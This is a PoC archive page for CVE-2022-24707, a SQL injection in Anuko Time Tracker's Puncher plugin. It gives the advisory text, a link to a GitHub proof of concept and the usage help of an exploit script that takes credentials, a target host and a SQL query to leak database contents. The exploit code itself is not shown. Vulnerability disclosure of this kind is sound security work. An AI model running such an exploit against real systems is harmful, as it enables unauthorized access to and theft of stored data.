Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2022-24707 PoC — SQL injection in anuko timetracker

Source
https://github.com/Altelus1/CVE-2022-24707
Associated Vulnerability
Title:SQL injection in anuko timetracker (CVE-2022-24707)
Description:Anuko Time Tracker is an open source, web-based time tracking application written in PHP. UNION SQL injection and time-based blind injection vulnerabilities existed in Time Tracker Puncher plugin in versions of anuko timetracker prior to 1.20.0.5642. This was happening because the Puncher plugin was reusing code from other places and was relying on an unsanitized date parameter in POST requests. Because the parameter was not checked, it was possible to craft POST requests with malicious SQL for Time Tracker database. This issue has been resolved in in version 1.20.0.5642. Users unable to upgrade are advised to add their own checks to input.
Description
PoC of CVE-2022-24707
Readme
# PoC for CVE-2022-24707

SQL Injection Vulnerability on Puncher plugin. A POST request can be crafted to exploit SQL Injection and leak database contents. This is tested on [Anuko Time Tracker 1.20.0.5640](https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d).

```
python3 exploit.py --help                                                               
usage: exploit.py [-h] --username USERNAME --password PASSWORD --host HOST [--sqli SQLI]

optional arguments:
  -h, --help           show this help message and exit
  --username USERNAME  Anuko Timetracker username
  --password PASSWORD  Anuko Timetracker password
  --host HOST          e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000
  --sqli SQLI          SQL query to run. Defaults to getting all tables
```

![cve gif](./CVE-2022-24707.gif)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →